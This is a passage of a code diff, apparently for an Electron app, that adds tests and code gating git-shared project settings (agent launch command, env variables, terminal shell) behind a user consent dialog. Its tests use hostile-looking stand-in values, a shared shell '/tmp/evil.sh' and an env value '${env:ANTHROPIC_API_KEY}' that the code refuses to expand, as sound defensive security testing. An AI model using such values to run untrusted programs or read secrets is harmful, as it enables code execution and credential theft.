+    expect(dismissed()).toEqual([])
+    await vi.advanceTimersByTimeAsync(2_000)
+    expect(await pending).toBe(false)
+    expect(dismissed()).toEqual([requestId])
+    expect(await trust.getRecord(localTrustKey('/proj/app'), 'agents')).toBeNull()
+
+    svc.submitConsent(requestId, 'approve')
+    await vi.advanceTimersByTimeAsync(0)
+    expect(await trust.getRecord(localTrustKey('/proj/app'), 'agents')).toBeNull()
+    expect(trustChanged()).toEqual([])
+  })
+
+  it('re-prompts with previouslyApproved=true once the approved content changed', async () => {
+    const trust = new ProjectTrustStore()
+    const stale = hashTrustContent(projectTrustContent('agents', { agents: { launchCmd: 'old' } })!)
+    await trust.record(localTrustKey('/proj/app'), 'agents', stale, '2026-08-01T00:00:00.000Z')
+    const svc = new ProjectSetupService({ trust, readSettings: async () => snapshot(sharedFile(agentsDoc)) })
+    const pending = svc.ensureFamilyTrusted(target(), 'agents')
+    await vi.waitFor(() => expect(familyPrompts('agents')).toHaveLength(1))
+    expect(familyPrompts('agents')[0].previouslyApproved).toBe(true)
+    svc.submitConsent(familyPrompts('agents')[0].requestId, 'skip')
+    expect(await pending).toBe(false)
+  })
+
+  it('the shell variant carries the bare program and records under the shell family', async () => {
+    const doc: ProjectSettingsDoc = { terminal: { shell: '/tmp/evil.sh', theme: 'dark' } }
+    const trust = new ProjectTrustStore()
+    const svc = new ProjectSetupService({ trust, readSettings: async () => snapshot(sharedFile(doc)) })
+    const pending = svc.ensureFamilyTrusted(target(), 'shell')
+    await vi.waitFor(() => expect(familyPrompts('shell')).toHaveLength(1))
+    const req = familyPrompts('shell')[0]
+    expect(req).toMatchObject({ family: 'shell', shell: '/tmp/evil.sh', projectName: 'App' })
+    svc.submitConsent(req.requestId, 'approve')
+    expect(await pending).toBe(true)
+    const hash = hashTrustContent(projectTrustContent('shell', doc)!)
+    expect(await trust.isTrusted(localTrustKey('/proj/app'), 'shell', hash)).toBe(true)
+    expect(await trust.getRecord(localTrustKey('/proj/app'), 'agents')).toBeNull()
+  })
+
+  it('single-flights per (location, family): concurrent asks share ONE prompt and ONE answer', async () => {
+    const trust = new ProjectTrustStore()
+    const svc = new ProjectSetupService({ trust, readSettings: async () => snapshot(sharedFile(agentsDoc)) })
+    // Two canvas nodes on the SAME folder: different project ids, one location, one question.
+    const a = svc.ensureFamilyTrusted(target({ projectId: 'p1' }), 'agents')
+    const b = svc.ensureFamilyTrusted(target({ projectId: 'p2' }), 'agents')
+    await vi.waitFor(() => expect(familyPrompts('agents')).toHaveLength(1))
+    await Promise.resolve()
+    await Promise.resolve()
+    expect(familyPrompts('agents')).toHaveLength(1)
+
+    svc.submitConsent(familyPrompts('agents')[0].requestId, 'approve')
+    expect(await a).toBe(true)
+    expect(await b).toBe(true)
+    // Every asker's project is invalidated, not just whoever happened to raise the prompt.
+    expect(trustChanged().sort()).toEqual(['p1', 'p2'])
+  })
+
+  it('shares the app-wide queue with a setup run — one dialog at a time', async () => {
+    const trust = new ProjectTrustStore()
+    const { runner } = recorder()
+    const svc = new ProjectSetupService({
+      trust,
+      readSettings: async () => snapshot(sharedFile({ ...agentsDoc, setup: { setupScript: 'npm ci' } })),
+      runLocal: runner
+    })
+    const run = svc.run(target(), 'setup')
+    await vi.waitFor(() => expect(consentRequests()).toHaveLength(1))
+    const ask = svc.ensureFamilyTrusted(target(), 'agents')
+    await Promise.resolve()
+    await Promise.resolve()
+    expect(familyPrompts('agents')).toEqual([])
+
+    svc.submitConsent(consentRequests()[0].requestId, 'skip')
+    expect(await run).toEqual({ status: 'skipped', reason: 'declined' })
+    await vi.waitFor(() => expect(familyPrompts('agents')).toHaveLength(1))
+    svc.submitConsent(familyPrompts('agents')[0].requestId, 'skip')
+    expect(await ask).toBe(false)
+  })
+
+  it('a trust WRITE failure is not an approval', async () => {
+    const trust = new ProjectTrustStore()
+    trust.record = async () => {
+      throw new Error('EACCES')
+    }
+    const svc = new ProjectSetupService({ trust, readSettings: async () => snapshot(sharedFile(agentsDoc)) })
+    const pending = svc.ensureFamilyTrusted(target(), 'agents')
+    await vi.waitFor(() => expect(familyPrompts('agents')).toHaveLength(1))
+    svc.submitConsent(familyPrompts('agents')[0].requestId, 'approve')
+    // A grant that exists only in memory is no grant: fail closed, and tell nobody it changed.
+    expect(await pending).toBe(false)
+    expect(trustChanged()).toEqual([])
+  })
+
+  it('gates an ssh target on its ssh location key, never the local one', async () => {
+    const ssh = { server: { host: 'h', user: 'u' }, remoteCwd: '/srv/app' }
+    const trust = new ProjectTrustStore()
+    const svc = new ProjectSetupService({ trust, readSettings: async () => snapshot(sharedFile(agentsDoc)) })
+    const pending = svc.ensureFamilyTrusted(target({ ssh }), 'agents')
+    await vi.waitFor(() => expect(familyPrompts('agents')).toHaveLength(1))
+    expect(familyPrompts('agents')[0].locationLabel).toBe('u@h:/srv/app')
+    svc.submitConsent(familyPrompts('agents')[0].requestId, 'approve')
+    expect(await pending).toBe(true)
+    const hash = hashTrustContent(projectTrustContent('agents', agentsDoc)!)
+    expect(await trust.isTrusted(sshTrustKey(ssh), 'agents', hash)).toBe(true)
+    expect(await trust.isTrusted(localTrustKey('/proj/app'), 'agents', hash)).toBe(false)
+  })
+
+  it('project-setup:request-trust derives the target from the workspace index, never the caller', async () => {
+    const asks: Array<[ProjectSetupTarget, string]> = []
+    registerProjectSetupHandlers(
+      plat,
+      {
+        run: async () => ({ status: 'skipped', reason: 'unavailable' }) as const,
+        cancel: () => false,
+        submitConsent: () => {},
+        ensureFamilyTrusted: async (t, family) => {
+          asks.push([t, family])
+          return true
+        }
+      },
+      {
+        projectTargetInfo: (projectId) => (projectId === 'p1' ? { cwd: '/proj/app', name: 'App' } : null),
+        worktreeList: async () => ({ ok: true, entries: [] })
+      }
+    )
+    const call = plat.handlers[IPC.projectSetupRequestTrust]
+    expect(await call('p1', 'agents')).toBe(true)
+    expect(asks[0]).toEqual([{ projectId: 'p1', projectName: 'App', rootPath: '/proj/app' }, 'agents'])
+
+    // Unknown project; a family this channel does not own (`setup` is the runner's own gate — a
+    // renderer must not be able to raise a setup prompt out of band); a non-string id; a missing
+    // family. All refused without ever reaching the service.
+    expect(await call('missing', 'agents')).toBe(false)
+    expect(await call('p1', 'setup')).toBe(false)
+    expect(await call(42, 'agents')).toBe(false)
+    expect(await call('p1')).toBe(false)
+    expect(asks).toHaveLength(1)
   })
 })

--- a/src/core/project-setup-service.ts
+++ b/src/core/project-setup-service.ts
@@ -5,13 +5,15 @@ import { IPC } from '../shared/ipc'
 import {
   projectTrustContent,
   resolveProjectSettings,
+  type ProjectConsentRequest,
   type ProjectSettingsDoc,
   type ProjectSettingsSnapshot,
   type ProjectSetupConsentAnswer,
   type ProjectSetupConsentRequest,
   type ProjectSetupEvent,
   type ProjectSetupKind,
-  type ProjectSetupRunResult
+  type ProjectSetupRunResult,
+  type ProjectTrustFamily
 } from '../shared/project-settings'
 import type { SshConnection } from '../shared/ssh'
 import { platform } from './platform'
@@ -39,6 +41,12 @@ import { ProjectTrustStore, hashTrustContent, localTrustKey, sshTrustKey } from 
  *
  * Spawning itself is injected (`runLocal`/`runSsh`) — this file knows nothing about child_process
  * or ssh, which is also what makes the gate testable without a shell.
+ *
+ * `ensureFamilyTrusted` is the same gate aimed at the families this service never RUNS — the launch
+ * settings (`agents`) and the terminal program (`shell`) a caller elsewhere is about to consume. It
+ * reuses every invariant above (one queue, one dialog, the trichotomy, location keying, host-only
+ * delivery) through the same `queuePrompt` core, and adds one of its own: an approval broadcasts
+ * `IPC.projectTrustChanged` so a renderer holding a stale "not trusted" verdict re-reads it.
  */
 
 /** How long an unanswered consent prompt is held before it is dismissed and reported as
@@ -116,6 +124,34 @@ function familyScripts(sharedDoc: ProjectSettingsDoc): ProjectSetupConsentReques
   return out
 }
 
+/** The families `ensureFamilyTrusted` answers for: everything a launcher consumes but this service
+ *  never runs itself. `setup` is excluded on purpose — the runner owns that gate, and admitting it
+ *  here would be a second, run-less way to raise a setup prompt. */
+export type ProjectConsumerFamily = Exclude<ProjectTrustFamily, 'setup'>
+
+/** The dialog payload for a consumer family, built from the SHARED document alone — exactly the
+ *  fields `projectTrustContent(family, …)` hashes, so what is rendered is what is approved. */
+function familyConsentPayload(
+  family: ProjectConsumerFamily,
+  sharedDoc: ProjectSettingsDoc,
+  base: { requestId: string; previouslyApproved: boolean; projectName: string; locationLabel: string }
+): ProjectConsentRequest {
+  if (family === 'shell') {
+    // Non-null by construction: a null `projectTrustContent('shell', …)` returned before this point.
+    return { family: 'shell', ...base, shell: sharedDoc.terminal?.shell ?? '' }
+  }
+  const agents = sharedDoc.agents
+  const req: ProjectConsentRequest = { family: 'agents', ...base }
+  if (agents?.launchCmd !== undefined) req.launchCmd = agents.launchCmd
+  if (agents?.env) {
+    // Key-sorted, like the hash's own canonical form, so the dialog's order is the approved order.
+    const env: Record<string, string> = {}
+    for (const k of Object.keys(agents.env).sort()) env[k] = agents.env[k]
+    req.env = env
+  }
+  return req
+}
+
 function locationLabel(target: ProjectSetupTarget): string {
   if (target.ssh) return `${target.ssh.server.user}@${target.ssh.server.host}:${target.ssh.remoteCwd}`
   const abs = path.resolve(target.rootPath)
@@ -138,11 +174,21 @@ interface ActiveRun {
   consentRequestId?: string
 }
 
+interface TrustFlight {
+  promise: Promise<boolean>
+  /** Every project id that asked while this one question was open. All of them are invalidated on
+   *  an approval: two canvas nodes on one folder share a trust key but not a project id. */
+  projectIds: Set<string>
+}
+
 export class ProjectSetupService {
   private readonly active = new Map<string, ActiveRun>()
   private readonly pending = new Map<string, (answer: ProjectSetupConsentAnswer | undefined) => void>()
-  /** App-wide prompt queue: each ask chains onto the previous one, so only one dialog is live. */
+  /** App-wide prompt queue: each ask chains onto the previous one, so only one dialog is live.
+   *  SHARED with `ensureFamilyTrusted` — a launch prompt and a setup prompt are the same modal. */
   private consentQueue: Promise<unknown> = Promise.resolve()
+  /** Live `ensureFamilyTrusted` asks, keyed by (family, LOCATION) — see `ensureFamilyTrusted`. */
+  private readonly trustFlights = new Map<string, TrustFlight>()
 
   constructor(private readonly deps: ProjectSetupDeps) {}
 
@@ -218,6 +264,99 @@ export class ProjectSetupService {
     }
   }
 
+  /**
+   * The SAME gate as `run`'s, for a family this service never executes: `agents` (launchCmd + env)
+   * and `shell` (the terminal program). A launcher calls this before it consumes a shared-sourced
+   * value; `true` means that family is trusted AT THIS LOCATION right now.
+   *
+   *  - Nothing executable in the SHARED document (`projectTrustContent` → null) → `true` with NO
+   *    prompt. There is nothing hostile to gate: a value that exists only in this machine's local
+   *    overlay is the user's own instruction (the same rule `run` applies to a local script).
+   *  - Already trusted (the family's shared-content hash matches the record) → `true`, no prompt.
+   *  - Otherwise ONE prompt, on the app-wide queue, and only `approve` records — skip and expiry
+   *    are both `false`, and neither leaves anything behind. A record that cannot be persisted is
+   *    not an approval either (fail closed rather than grant something only memory knows).
+   *
+   * SINGLE-FLIGHT per (family, LOCATION): concurrent askers share one promise, so five nodes
+   * launching against the same folder raise ONE dialog, not five. The flight is keyed by the trust
+   * key — the same identity the approval itself is keyed by — so joiners are asking the same
+   * question about the same document, and every joiner's projectId is invalidated on approval.
+   */
+  async ensureFamilyTrusted(target: ProjectSetupTarget, family: ProjectConsumerFamily): Promise<boolean> {
+    const trustKey = trustKeyFor(target)
+    const flightKey = `${family}\0${trustKey}`
+    const inflight = this.trustFlights.get(flightKey)
+    if (inflight) {
+      inflight.projectIds.add(target.projectId)
+      return inflight.promise
+    }
+    const flight: TrustFlight = { projectIds: new Set([target.projectId]), promise: Promise.resolve(false) }
+    // Registered BEFORE the first await inside `resolveFamilyTrust` can settle, so a caller that
+    // asks in the same tick joins this flight instead of opening a second dialog.
+    flight.promise = this.resolveFamilyTrust(target, family, trustKey, flight).finally(() => {
+      this.trustFlights.delete(flightKey)
+    })
+    this.trustFlights.set(flightKey, flight)
+    return flight.promise
+  }
+
+  private async resolveFamilyTrust(
+    target: ProjectSetupTarget,
+    family: ProjectConsumerFamily,
+    trustKey: string,
+    flight: TrustFlight
+  ): Promise<boolean> {
+    let snap: ProjectSettingsSnapshot | null
+    try {
+      snap = await this.deps.readSettings(target.projectId)
+    } catch {
+      return false // settings unreadable → no verdict, and a no-verdict is never a yes
+    }
+    const sharedDoc: ProjectSettingsDoc = snap?.shared ?? {}
+    const content = projectTrustContent(family, sharedDoc)
+    if (content === null) return true // nothing shared to gate
+    const hash = hashTrustContent(content)
+    let trusted: boolean
+    try {
+      trusted = await this.deps.trust.isTrusted(trustKey, family, hash)
+    } catch {
+      return false
+    }
+    if (trusted) return true
+
+    const answer = await this.askFamilyConsent(trustKey, family, sharedDoc, target)
+    if (answer !== 'approve') return false
+    try {
+      await this.deps.trust.record(trustKey, family, hash, new Date(this.now()).toISOString())
+    } catch {
+      return false
+    }
+    // The renderer's launch-info cache is keyed by project id, so every asker is told — including
+    // the ones that merely joined this flight.
+    for (const projectId of flight.projectIds) {
+      platform().broadcast(IPC.projectTrustChanged, { projectId })
+    }
+    return true
+  }
+
+  private askFamilyConsent(
+    trustKey: string,
+    family: ProjectConsumerFamily,
+    sharedDoc: ProjectSettingsDoc,
+    target: ProjectSetupTarget
+  ): Promise<ProjectSetupConsentAnswer | undefined> {
+    return this.queuePrompt({
+      trustKey,
+      family,
+      payload: (base) =>
+        familyConsentPayload(family, sharedDoc, {
+          ...base,
+          projectName: target.projectName,
+          locationLabel: locationLabel(target)
+        })
+    })
+  }
+
   /** Aborts a run — live OR still waiting at its consent dialog. `false` = nothing by that runKey
    *  exists (already finished, or never did). */
   cancel(runKey: string): boolean {
@@ -238,10 +377,9 @@ export class ProjectSetupService {
   /**
    * Shell shutdown: abort every run still in flight. A local run is a DETACHED process group
    * (setsid, so a cancel can SIGKILL the whole tree) — which is also why quitting without this
-   * leaves `npm ci` churning with nothing left to report to, and, on the ssh leg, an orphaned remote
-   * command. Goes through `cancel`, so a run parked at its consent dialog is closed and its dialog
-   * dismissed too. Idempotent: Electron's `before-quit` runs twice, and the second pass finds
-   * nothing left.
+   * leaves `npm ci` churning with nothing left to report to. Goes through `cancel`, so a run parked
+   * at its consent dialog is closed and its dialog dismissed too. Idempotent: Electron's
+   * `before-quit` runs twice, and the second pass finds nothing left.
    */
   disposeAll(): void {
     for (const runKey of [...this.active.keys()]) this.cancel(runKey)
@@ -269,18 +407,47 @@ export class ProjectSetupService {
     trustKey: string,
     req: Omit<ProjectSetupConsentRequest, 'requestId' | 'previouslyApproved'>
   ): Promise<ProjectSetupConsentAnswer | undefined> {
-    const step = this.consentQueue.then(async () => {
+    return this.queuePrompt({
+      trustKey,
+      family: 'setup',
       // Cancelled while queued behind another dialog — never raise one for a run that is gone.
-      if (entry.abort.signal.aborted) return undefined
+      skipIf: () => entry.abort.signal.aborted,
+      // So `cancel` can close the dialog this run is parked at instead of leaving a modal up for a
+      // run that no longer exists.
+      bind: (requestId) => {
+        entry.consentRequestId = requestId
+      },
+      payload: (base) => ({ family: 'setup', ...req, ...base })
+    })
+  }
+
+  /**
+   * THE prompt: one dialog at a time, app-wide, whatever family asked. Shared by the setup runner
+   * (`askConsent`) and the launch-settings gate (`askFamilyConsent`) so there is exactly one place
+   * that mints a requestId, holds the expiry, and delivers through the host-only seam — a second
+   * copy of this is how one caller ends up with a prompt that cannot expire, or that a stale
+   * requestId can answer.
+   */
+  private queuePrompt(opts: {
+    trustKey: string
+    family: ProjectTrustFamily
+    /** Checked at PROMPT time (not enqueue time): true → no dialog, answer `undefined`. */
+    skipIf?: () => boolean
+    /** The live requestId while the dialog is up, then `undefined`. */
+    bind?: (requestId: string | undefined) => void
+    payload: (base: { requestId: string; previouslyApproved: boolean }) => ProjectConsentRequest
+  }): Promise<ProjectSetupConsentAnswer | undefined> {
+    const step = this.consentQueue.then(async () => {
+      if (opts.skipIf?.()) return undefined
       // Read at PROMPT time, not at enqueue time: an earlier prompt in the queue may have just
       // recorded an approval for this same location. Dialog copy only — the grant was the
       // `isTrusted` hash comparison, which already said no.
-      const previouslyApproved = !!(await this.deps.trust.getRecord(trustKey, 'setup'))
+      const previouslyApproved = !!(await this.deps.trust.getRecord(opts.trustKey, opts.family))
       return new Promise<ProjectSetupConsentAnswer | undefined>((resolve) => {
         const requestId = randomUUID()
         const settle = (answer: ProjectSetupConsentAnswer | undefined): void => {
           this.pending.delete(requestId)
-          entry.consentRequestId = undefined
+          opts.bind?.(undefined)
           resolve(answer)
         }
         const timer = setTimeout(() => {
@@ -292,9 +459,8 @@ export class ProjectSetupService {
           clearTimeout(timer)
           settle(answer)
         })
-        entry.consentRequestId = requestId
-        const payload: ProjectSetupConsentRequest = { ...req, requestId, previouslyApproved }
-        this.sendConsent(IPC.projectSetupConsentRequest, payload)
+        opts.bind?.(requestId)
+        this.sendConsent(IPC.projectSetupConsentRequest, opts.payload({ requestId, previouslyApproved }))
       })
     })
     // A rejected step must not poison the queue for every later prompt.

--- a/src/core/project-spawn-overrides.test.ts
+++ b/src/core/project-spawn-overrides.test.ts
@@ -1,0 +1,237 @@
+// `makeProjectSpawnOverrides` — the ONE decision a spawn asks about a project's settings.
+//
+// Two rules carry the whole file. (1) A LOCAL value is the user's own typing on this machine and is
+// always consumed. (2) A SHARED value arrived through git (or off a remote host) and is consumed
+// only while the family's shared-content hash is trusted AT THIS LOCATION — the same verdict
+// `project-settings:launch-info` reports, computed by the same helper, so the two can never drift.
+// Everything else is fail-open: a spawn must never be blocked, delayed or failed by this reader.
+import { describe, it, expect, vi } from 'vitest'
+import { makeProjectSpawnOverrides } from './project-spawn-overrides'
+import { hashTrustContent, localTrustKey, sshTrustKey } from './project-trust-store'
+import { projectTrustContent, type ProjectSettingsSnapshot } from '../shared/project-settings'
+import type { ProjectSetupTargetInfo } from './project-setup-runner-local'
+
+const CWD = '/repo/app'
+const KEY = localTrustKey(CWD)
+
+function snapshot(
+  shared: ProjectSettingsSnapshot['shared'],
+  local?: ProjectSettingsSnapshot['local']
+): ProjectSettingsSnapshot {
+  return { shared, local }
+}
+
+function sharedDoc(doc: object): ProjectSettingsSnapshot['shared'] {
+  return { version: 1, rev: 1, savedAt: '', ...doc } as ProjectSettingsSnapshot['shared']
+}
+
+/** A reader over one project, with a trust store that only knows the hashes it was handed. */
+function make(opts: {
+  snap?: ProjectSettingsSnapshot | null
+  info?: ProjectSetupTargetInfo | null
+  trusted?: string[]
+  readSettings?: () => Promise<ProjectSettingsSnapshot | null>
+  isTrusted?: () => Promise<boolean>
+}) {
+  const asked: Array<[string, string, string]> = []
+  const requested: Array<[string, string]> = []
+  const read = makeProjectSpawnOverrides({
+    readSettings: opts.readSettings ?? (async () => opts.snap ?? null),
+    targetInfo: () => (opts.info === undefined ? { cwd: CWD, name: 'app' } : opts.info),
+    trust: {
+      isTrusted: async (key, family, hash) => {
+        asked.push([key, family, hash])
+        if (opts.isTrusted) return opts.isTrusted()
+        return (opts.trusted ?? []).includes(hash)
+      }
+    },
+    requestTrust: (projectId, family) => {
+      requested.push([projectId, family])
+    }
+  })
+  return { read, asked, requested }
+}
+
+describe('makeProjectSpawnOverrides — env', () => {
+  it('applies a LOCAL env with no trust question at all', async () => {
+    const { read, asked, requested } = make({
+      snap: snapshot(null, { agents: { env: { FOO: 'bar' } } })
+    })
+    expect(await read('p1')).toEqual({ env: { FOO: 'bar' } })
+    expect(asked).toEqual([])
+    expect(requested).toEqual([])
+  })
+
+  it('applies a SHARED env once the agents family is trusted at this location', async () => {
+    const doc = { agents: { env: { API: 'k' } } }
+    const hash = hashTrustContent(projectTrustContent('agents', doc)!)
+    const { read, asked, requested } = make({ snap: snapshot(sharedDoc(doc)), trusted: [hash] })
+    expect(await read('p1')).toEqual({ env: { API: 'k' } })
+    expect(asked).toEqual([[KEY, 'agents', hash]])
+    expect(requested).toEqual([])
+  })
+
+  it('OMITS a shared env that is not trusted, and asks for trust exactly once', async () => {
+    const doc = { agents: { env: { API: 'k' } } }
+    const { read, requested } = make({ snap: snapshot(sharedDoc(doc)), trusted: [] })
+    expect(await read('p1')).toBeNull()
+    expect(requested).toEqual([['p1', 'agents']])
+  })
+
+  it('uses the SSH location key when the project lives on a remote host', async () => {
+    const doc = { agents: { env: { API: 'k' } } }
+    const hash = hashTrustContent(projectTrustContent('agents', doc)!)
+    const ssh = { server: { host: 'h', user: 'u', port: 2222 }, remoteCwd: '/srv/app' }
+    const { read, asked } = make({
+      snap: snapshot(sharedDoc(doc)),
+      info: { name: 'app', ssh },
+      trusted: [hash]
+    })
+    expect(await read('p1')).toEqual({ env: { API: 'k' } })
+    expect(asked[0][0]).toBe(sshTrustKey(ssh))
+  })
+
+  it('a local env SHADOWS the shared one and is never gated (the resolver already picked it)', async () => {
+    const { read, asked } = make({
+      snap: snapshot(sharedDoc({ agents: { env: { API: 'shared' } } }), {
+        agents: { env: { API: 'mine' } }
+      })
+    })
+    expect(await read('p1')).toEqual({ env: { API: 'mine' } })
+    expect(asked).toEqual([])
+  })
+})
+
+describe('makeProjectSpawnOverrides — shell', () => {
+  it('applies a LOCAL shell with no trust question', async () => {
+    const { read, asked } = make({ snap: snapshot(null, { terminal: { shell: '/bin/fish' } }) })
+    expect(await read('p1')).toEqual({ shell: '/bin/fish' })
+    expect(asked).toEqual([])
+  })
+
+  it('applies a SHARED shell once the shell family is trusted', async () => {
+    const doc = { terminal: { shell: '/bin/zsh' } }
+    const hash = hashTrustContent(projectTrustContent('shell', doc)!)
+    const { read } = make({ snap: snapshot(sharedDoc(doc)), trusted: [hash] })
+    expect(await read('p1')).toEqual({ shell: '/bin/zsh' })
+  })
+
+  it('OMITS an untrusted shared shell and asks for trust', async () => {
+    const { read, requested } = make({
+      snap: snapshot(sharedDoc({ terminal: { shell: '/bin/zsh' } })),
+      trusted: []
+    })
+    expect(await read('p1')).toBeNull()
+    expect(requested).toEqual([['p1', 'shell']])
+  })
+
+  it('asks for BOTH families when both are shared and neither is trusted', async () => {
+    const { read, requested } = make({
+      snap: snapshot(sharedDoc({ agents: { env: { A: '1' } }, terminal: { shell: '/bin/zsh' } })),
+      trusted: []
+    })
+    expect(await read('p1')).toBeNull()
+    expect(requested).toEqual([
+      ['p1', 'agents'],
+      ['p1', 'shell']
+    ])
+  })
+})
+
+describe('makeProjectSpawnOverrides — fail open', () => {
+  it('answers null when the project has no settings at all', async () => {
+    expect(await make({ snap: null }).read('p1')).toBeNull()
+  })
+
+  it('answers null when nothing in the document is a spawn override', async () => {
+    const { read } = make({ snap: snapshot(sharedDoc({ setup: { setupScript: 'make' } })) })
+    expect(await read('p1')).toBeNull()
+  })
+
+  it('answers null (never throws) when the settings read rejects', async () => {
+    const { read } = make({
+      readSettings: () => Promise.reject(new Error('EIO'))
+    })
+    await expect(read('p1')).resolves.toBeNull()
+  })
+
+  it('treats a trust store that throws as NOT trusted, and still answers', async () => {
+    const { read, requested } = make({
+      snap: snapshot(sharedDoc({ agents: { env: { A: '1' } } })),
+      isTrusted: () => Promise.reject(new Error('EACCES'))
+    })
+    await expect(read('p1')).resolves.toBeNull()
+    expect(requested).toEqual([['p1', 'agents']])
+  })
+
+  it('survives a requestTrust that throws — the ask is fire-and-forget', async () => {
+    const read = makeProjectSpawnOverrides({
+      readSettings: async () => snapshot(sharedDoc({ agents: { env: { A: '1' } } })),
+      targetInfo: () => ({ cwd: CWD, name: 'app' }),
+      trust: { isTrusted: async () => false },
+      requestTrust: () => {
+        throw new Error('no window')
+      }
+    })
+    await expect(read('p1')).resolves.toBeNull()
+  })
+
+  it('does not wait on requestTrust (a dialog stays open for minutes)', async () => {
+    let settle: (() => void) | undefined
+    const read = makeProjectSpawnOverrides({
+      readSettings: async () => snapshot(sharedDoc({ agents: { env: { A: '1' } } })),
+      targetInfo: () => ({ cwd: CWD, name: 'app' }),
+      trust: { isTrusted: async () => false },
+      requestTrust: () => new Promise<boolean>((r) => (settle = () => r(true)))
+    })
+    await expect(read('p1')).resolves.toBeNull()
+    expect(settle).toBeTypeOf('function')
+  })
+
+  it('a cwd-less inline canvas still resolves (no shared doc to gate)', async () => {
+    const { read } = make({ snap: snapshot(null, { agents: { env: { A: '1' } } }), info: null })
+    expect(await read('p1')).toEqual({ env: { A: '1' } })
+  })
+
+  it('registers no requestTrust at all without one wired', async () => {
+    const read = makeProjectSpawnOverrides({
+      readSettings: async () => snapshot(sharedDoc({ terminal: { shell: '/bin/zsh' } })),
+      targetInfo: () => ({ cwd: CWD, name: 'app' }),
+      trust: { isTrusted: async () => false }
+    })
+    await expect(read('p1')).resolves.toBeNull()
+  })
+})
+
+describe('makeProjectSpawnOverrides — literal values only', () => {
+  // `${env:VAR}` expansion is a CUSTOM-AGENT feature (custom-agent-env.ts), deliberately NOT
+  // inherited here: a project's settings.json is git-shared hostile input, and expansion would turn
+  // an approved-looking literal into a read of this machine's process environment.
+  it('passes a ${env:…}-shaped value through verbatim', async () => {
+    const { read } = make({
+      snap: snapshot(null, { agents: { env: { TOKEN: '${env:ANTHROPIC_API_KEY}' } } })
+    })
+    expect(await read('p1')).toEqual({ env: { TOKEN: '${env:ANTHROPIC_API_KEY}' } })
+  })
+})
+
+describe('makeProjectSpawnOverrides — hash rule shared with launch-info', () => {
+  it('asks the trust store the SAME (key, family, hash) the launch-info verdict asks', async () => {
+    const doc = { agents: { launchCmd: 'claude --yolo', env: { A: '1' } } }
+    const { read, asked } = make({ snap: snapshot(sharedDoc(doc)), trusted: [] })
+    await read('p1')
+    // Hashed from the SHARED document alone, covering launchCmd AND env together.
+    expect(asked).toEqual([[KEY, 'agents', hashTrustContent(projectTrustContent('agents', doc)!)]])
+  })
+
+  it('never gates a family whose shared half is empty (nothing to approve)', async () => {
+    const spy = vi.fn(async () => false)
+    const read = makeProjectSpawnOverrides({
+      readSettings: async () => snapshot(sharedDoc({}), { agents: { env: { A: '1' } } }),
+      targetInfo: () => ({ cwd: CWD, name: 'app' }),
+      trust: { isTrusted: spy }
+    })
+    expect(await read('p1')).toEqual({ env: { A: '1' } })
+    expect(spy).not.toHaveBeenCalled()
+  })
+})

--- a/src/core/project-spawn-overrides.ts
+++ b/src/core/project-spawn-overrides.ts
@@ -1,0 +1,114 @@
+import {
+  resolveProjectSettings,
+  type ProjectSettingsDoc,
+  type ProjectSettingsSnapshot,
+  type ResolvedProjectSetting
+} from '../shared/project-settings'
+import type { ProjectConsumerFamily } from './project-setup-service'
+import type { ProjectSetupTargetInfo } from './project-setup-runner-local'
+import type { ProjectTrustStore } from './project-trust-store'
+import { projectFamilyTrusted, projectTrustKeyFor } from './project-trust-verdict'
+
+/**
+ * What a project contributes to a session it owns: environment variables and the terminal program.
+ * `PtyManager` consumes exactly this and nothing else (`setProjectSpawnOverrides`).
+ *
+ * Absent fields mean "the project has no opinion" — never "clear what was there". A spawn with no
+ * overrides at all answers `null`, so the whole feature costs one skipped branch on every path that
+ * has no project settings.
+ */
+export interface ProjectSpawnOverrides {
+  /** LITERAL values only. `${env:VAR}` is NOT expanded here — that is a custom-agent feature
+   *  (custom-agent-env.ts) and inheriting it would turn a git-shared settings.json into a read of
+   *  this machine's process environment, laundered past a dialog that rendered the literal. The
+   *  keys/values are already bounded and identifier-shaped by the Task 1 sanitizer. */
+  env?: Record<string, string>
+  /** Still validated at the spawn (`safeSessionProgram`) — see `PtyManager.spawnSession`. */
+  shell?: string
+}
+
+export type ProjectSpawnOverridesReader = (
+  projectId: string
+) => Promise<ProjectSpawnOverrides | null>
+
+export interface ProjectSpawnOverridesDeps {
+  /** This shell's own settings resolution (e.g. `WorkspaceStore.readProjectSettings`). */
+  readSettings(projectId: string): Promise<ProjectSettingsSnapshot | null>
+  /**
+   * The project's LOCATION, from this process's own workspace index (e.g.
+   * `WorkspaceStore.projectTargetInfo`) — never from the renderer, and never derived from the
+   * git-shared `project.json`. Required because trust is keyed by location, not project id.
+   */
+  targetInfo(projectId: string): ProjectSetupTargetInfo | null
+  trust: Pick<ProjectTrustStore, 'isTrusted'>
+  /**
+   * Raise the consent dialog for a family whose SHARED value was just refused
+   * (`ProjectSetupService.ensureFamilyTrusted`, single-flight per family+location). FIRE AND
+   * FORGET: this spawn has already decided to go without the value — waiting on a human would
+   * block a terminal for up to five minutes, and the answer arrives in time for the NEXT launch.
+   * Optional so a shell with no consent surface still gets the local-value half.
+   */
+  requestTrust?(projectId: string, family: ProjectConsumerFamily): unknown
+}
+
+/** Shared-sourced values are the gated ones; a local value is this machine's own typing. */
+function isShared<T>(r: ResolvedProjectSetting<T> | undefined): boolean {
+  return r?.source === 'shared'
+}
+
+/**
+ * The ONE reader both shells inject into `PtyManager` (main/index.ts + server/index.ts).
+ *
+ * Rules, in the order they matter:
+ *  1. A LOCAL value is always consumed, with no trust question and no prompt — the user typed it
+ *     into this machine's own overlay, which is the same reason `ProjectSetupService.run` never
+ *     gates a local script.
+ *  2. A SHARED value (git, or a remote host's disk) is consumed only while its family's
+ *     shared-content hash is trusted at this LOCATION — the verdict computed by
+ *     `projectFamilyTrusted`, the same helper `project-settings:launch-info` reports from.
+ *  3. An untrusted shared value is OMITTED and the family's consent dialog is requested
+ *     fire-and-forget. The spawn is never delayed by it.
+ *  4. Everything else fails OPEN: no settings, an unreadable document, a throwing trust store, a
+ *     throwing `requestTrust` — all answer "no overrides", never an exception into the spawn path.
+ */
+export function makeProjectSpawnOverrides(
+  deps: ProjectSpawnOverridesDeps
+): ProjectSpawnOverridesReader {
+  return async (projectId: string): Promise<ProjectSpawnOverrides | null> => {
+    let snap: ProjectSettingsSnapshot | null
+    try {
+      snap = await deps.readSettings(projectId)
+    } catch {
+      return null
+    }
+    if (!snap) return null
+    const resolved = resolveProjectSettings(snap.local, snap.shared ?? undefined)
+    const envSetting = resolved.agents.env
+    const shellSetting = resolved.terminal.shell
+    if (!envSetting && !shellSetting) return null
